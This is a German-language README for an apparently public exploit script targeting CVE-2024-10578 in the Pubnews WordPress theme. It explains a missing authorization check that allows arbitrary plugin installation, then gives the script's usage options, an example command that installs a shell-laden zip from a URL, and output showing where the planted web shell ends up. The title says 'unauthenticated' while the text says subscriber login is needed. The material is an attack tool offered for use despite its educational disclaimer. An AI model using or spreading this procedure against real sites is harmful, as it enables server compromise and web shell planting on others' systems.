
Pubnews <= 1.0.7 - Nicht authentifizierte beliebige Plugin-Installation
Das Pubnews-Theme für WordPress ist anfällig für eine unbefugte beliebige Plugin-Installation aufgrund einer fehlenden Berechtigungsprüfung in der Funktion pubnews_importer_plugin_action_for_notice() in allen Versionen bis einschließlich 1.0.7. Diese Schwachstelle ermöglicht es authentifizierten Angreifern mit Zugriff auf Abonnentenebene und höher, beliebige Plugins zu installieren, die ausgenutzt werden können, um weitere Schwachstellen zu missbrauchen.
Dieses Skript nutzt die Schwachstelle im Pubnews-Theme aus, um ein beliebiges Plugin von einer bereitgestellten URL zu installieren. Das Plugin kann eine bösartige Shell oder eine andere Nutzlast enthalten.
CVE-2024-10578.py [-h] -u URL -un USERNAME -p PASSWORD -url_zip PLUGIN_URL
Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited, Khaled alenazi
options:
-h, --help show this help message and exit
-u, --url URL The URL of the WordPress site
-un, --username USERNAME
The username for WordPress login
-p, --password PASSWORD
The password for WordPress login
-url_zip, --plugin_url PLUGIN_URL
The plugin URL to install (must be a zip file with the shell injected inside)
python
CVE-2024-10578.py -u http://target/wordpress -un admin -p admin -url_zip http://target/shell1.zip
[+] Logged in successfully.
[+] Admin _wpnonce extracted: 6bf22371ab
[+] Plugin installed successfully.
[+] Plugin extracted. You can find the shell here: /wp-content/plugins/shell1/
Dieses Skript dient nur zu Bildungszwecken. Der Autor befürwortet nicht die Verwendung dieses Skripts für illegale Aktivitäten. Verwenden Sie es verantwortungsbewusst und nur auf Systemen, für die Sie eine ausdrückliche Erlaubnis zum Testen haben.
Von: Nxploited | Khaled Alenazi